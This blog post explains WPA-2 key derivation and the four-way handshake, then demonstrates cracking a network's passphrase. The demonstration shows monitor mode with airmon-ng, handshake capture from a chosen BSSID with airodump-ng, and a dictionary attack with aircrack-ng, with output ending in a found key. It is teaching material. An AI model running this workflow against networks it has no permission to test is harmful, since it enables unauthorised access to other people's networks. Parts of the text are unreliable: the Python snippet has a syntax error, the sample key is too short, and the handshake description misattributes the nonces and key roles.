WPA-2 Hash Cracking

Within WPA-2 we aim to create an initial pairing between the client and the access point, and then to identify them without giving away the password which has been used. In the initial authentication we the client will either use pre-shared key (PSK), or use an EAP exchange through 802.1X (EAPOL). The EAPOL exchange requires the usage of an authentication server. After this phase a shared secret key is created, and is known as the Pairwise Master Key (PMK). This uses PBKDF2-SHA1 as a hashing method, as the PBKDF2 part makes difficult to crack the hash (as there are a number of rounds used to slow down the hashing process). Within PSK, the PSK is defined with the PMK, but within EAPOL, the PMK is derived from EAP parameters. Generally EAPOL is more difficult to crack than using PSK. The PMK is generated from the PSK with:

PMK = PBKDF2(HMAC−SHA1, PSK, SSID, 4096, 256)

and where we use the SHA1 hashing function with HMAC as the message authentication code. In this case the PMK is generated from 4096 iterations of the hashing method and creates a 256-bit PMK. A simple Python script to generate the PMK is:

from pbkdf2 import PBKDF2
ssid = 'home'
phrase = 'qwerty123'
print "SSID: "+ssid
print "Pass phrase: "+phrase
print "Pairwise Master Key: " + PBKDF2(phrase, ssid, 4096).read(32).encode("hex"))

and a sample run is [here]:

SSID: home
Pass phrase: qwerty123
Pairwise Master Key: bbaf585c301dc4d4024523535f42baf04630f852e2b01979ec0401edcdf

Within WPA-2 we get the four-way handshake process, and which is illustrated in Figure 1. It is designed so that the access point and wireless client can prove that they know each other by showing that the know the PSK/PMK, without ever releasing the key. They must the encrypt messages to each other, and if they can decrypt them, then they have successfully authenticated each other. In this way we can protect against a malious spoof access point which is broadcasting the valid looking SSID.

Overall the PMK will last for the complete authenticaiton of the devices, and should be used sparenly. Thus the four-way handshake uses a derive key known as the Pairwise Transient Key (PTK), and which is generated from the PMK, a client nouce (ANounce), an access point nouce (SNouce), and the MAC addresses of the client and the access point (AP). These are then put into a pseudo random function, and generate a GTK (Group Temporal Key). The GTK is then used to decrypt multicast and broadcast traffic.

The details of the handshake are thus:

  • AP sends a nonce to the STA (ANonce). The client creates the PTK.
  • Client nonce (SNonce) to AP and a Message Integrity Code (MIC), and which includes the authentication.
  • The AP creates PTK and sends the GTK, along with a sequence number together and an MIC.
  • The client sends a confirmation to the AP.
Figure 1

A demo of the cracking of WPA-2 is:

The following shows the setup:

And test with airmon-ng:

root@kali:~  airmon-ngPHY	Interface	Driver		Chipsetnull	wlan0		??????		Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
phy0 wlan1 ?????? Broadcom 43430
phy1 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070
root@kali:~ airmon-ng start wlan2Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
175 NetworkManager
363 wpa_supplicant
491 dhclient
609 dhclient
PHY Interface Driver Chipsetnull wlan0 ?????? Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
phy0 wlan1 ?????? Broadcom 43430
phy1 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy1]wlan2 on [phy1]wlan2mon)
(mac80211 station mode vif disabled for [phy1]wlan2)

We can see we are now monitoring on wlan2mon, and to test:

root@kali:~  airodump-ng wlan2mon 
CH 5 ][ Elapsed: 1 min ][ 2017-02-19 12:10


XX:FC:AF:XX:XX:XX -44 39 893 24 1 22e WPA ZZZZZ
XX:A1:XX:XX:XX:XX -49 34 0 0 11 54e WPA2 CCMP PSK ZZZZZ
XX:D3:XX:XX:XX:XX -65 46 0 0 6 54e WPA2 CCMP PSK ZZZZZ
XX:21:XX:XX:XX:XX -90 3 1 0 13 54e WPA2 CCMP PSK ZZZZZ

BSSID STATION PWR Rate Lost Frames Probe

(not associated) XX:XX:XX:XX:XX:XX -44 0 - 1 0 10 ZZZZZ
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -1 0e- 0 0 46
XX:XX:XX:XX:XX:XX XX:XX:XX:2B:XX:XX -20 0e- 0e 0 836

We can now grab the four way handshake with:

airodump-ng -c 1 --bssid  XX:FC:AF:XX:XX:XX -w psk wlan2mon

This reads for the required BSSID on Channel 1, and will create a file which begins with psk, and has a .cap extension.

The output here is:

CH  1 ][ Elapsed: 18 s ][ 2017-02-19 21:38 ][ WPA handshake: XX:FC:AF:XX:XX:XX       


XX:FC:AF:XX:XX:XX -30 0 215 3077 90 1 54e WPA2 CCMP PSK ZZZZZ

BSSID STATION PWR Rate Lost Frames Probe

XX:FC:AF:XX:XX:XX XX:XX:XX:XX:XX:XX 3 -22 0e- 1e 0 2569

Next we create a list of passwords in password.lst.

We can then analyse the cap files with:

aircrack-ng -w password.lst -b  XX:FC:AF:XX:XX:XX psk*.cap

This gives the results of (where some details have been removed):

Aircrack-ng 1.2 rc4      [00:00:00] 2/1 keys tested (28.31 k/s)       Time left: 0 seconds                                     200.00%                          KEY FOUND! [ ------- ]
Master Key : 5C ------------------- 0C
3A ------------------- 53
Transient Key : 6A ------------------- EB
4D ------------------- 72
7A ------------------- 87
80 ------------------- 21
EAPOL HMAC : C0 ------------------- 95
Prof Bill Buchanan OBE

Written by

Professor of Cryptography. Serial innovator. Believer in fairness, justice & freedom. EU Citizen. Auld Reekie native. Old World Breaker. New World Creator.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade